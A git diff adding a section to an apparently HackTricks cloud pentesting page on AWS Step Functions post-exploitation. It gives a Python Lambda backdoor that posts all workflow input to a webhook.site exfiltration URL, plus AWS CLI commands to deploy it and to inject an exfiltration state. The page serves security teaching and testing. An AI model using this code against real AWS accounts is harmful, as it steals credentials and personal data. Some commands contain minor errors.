diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 6a0cd5ba9..2fcff0d2e 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -71,6 +71,133 @@ aws stepfunctions untag-resource --resource-arn --tag-keys **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +--- + +### `states:UpdateStateMachine`, `lambda:UpdateFunctionCode` + +An attacker who compromises a user or role with the following permissions: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowUpdateStateMachine", + "Effect": "Allow", + "Action": "states:UpdateStateMachine", + "Resource": "*" + }, + { + "Sid": "AllowUpdateFunctionCode", + "Effect": "Allow", + "Action": "lambda:UpdateFunctionCode", + "Resource": "*" + } + ] +} +``` + +...can conduct a **high-impact and stealthy post-exploitation attack** by combining Lambda backdooring with Step Function logic manipulation. + +This scenario assumes that the victim uses **AWS Step Functions to orchestrate workflows that process sensitive input**, such as credentials, tokens, or PII. + +Example victim invocation: + +```bash +aws stepfunctions start-execution \ + --state-machine-arn arn:aws:states:us-east-1::stateMachine:LegitStateMachine \ + --input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim +``` + +If the Step Function is configured to invoke a Lambda like `LegitBusinessLogic`, the attacker can proceed with **two stealthy attack variants**: + +--- + +#### Updated the lambda function + +The attacker modifies the code of the Lambda function already used by the Step Function (`LegitBusinessLogic`) to silently exfiltrate input data. + +```python +# send_to_attacker.py +import requests + +def lambda_handler(event, context): + requests.post("https://webhook.site//exfil", json=event) + return {"status": "exfiltrated"} +``` + +```bash +zip function.zip send_to_attacker.py + +aws lambda update-function-code \ + --function-name LegitBusinessLogic \ + --zip-file fileb://function.zip -profile attacker +``` + +--- + +#### Add a Malicious State to the Step Function + +Alternatively, the attacker can inject an **exfiltration state** at the beginning of the workflow by updating the Step Function definition. + +```malicious_state_definition.json +{ + "Comment": "Backdoored for Exfiltration", + "StartAt": "OriginalState", + "States": { + "OriginalState": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1::function:LegitBusinessLogic", + "End": true + } + } +} + +``` + +```bash +aws stepfunctions update-state-machine \ + --state-machine-arn arn:aws:states:us-east-1::stateMachine:LegitStateMachine \ + --definition file://malicious_state_definition.json --profile attacker +``` + +The attacker can even more stealthy to update the state definition to something like this +{ + "Comment": "Backdoored for Exfiltration", + "StartAt": "ExfiltrateSecrets", + "States": { + "ExfiltrateSecrets": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker", + "InputPath": "$", + "ResultPath": "$.exfil", + "Next": "OriginalState" + }, + "OriginalState": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic", + "End": true + } + } +} + where the victim won't realize the different + +--- + +### Victim Setup (Context for Exploit) + +- A Step Function (`LegitStateMachine`) is used to process sensitive user input. +- It calls one or more Lambda functions such as `LegitBusinessLogic`. + +--- + +**Potential Impact**: +- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII. +- No visible errors or failures in workflow execution. +- Difficult to detect without auditing Lambda code or execution traces. +- Enables long-term persistence if backdoor remains in code or ASL logic. + + {{#include ../../../banners/hacktricks-training.md}}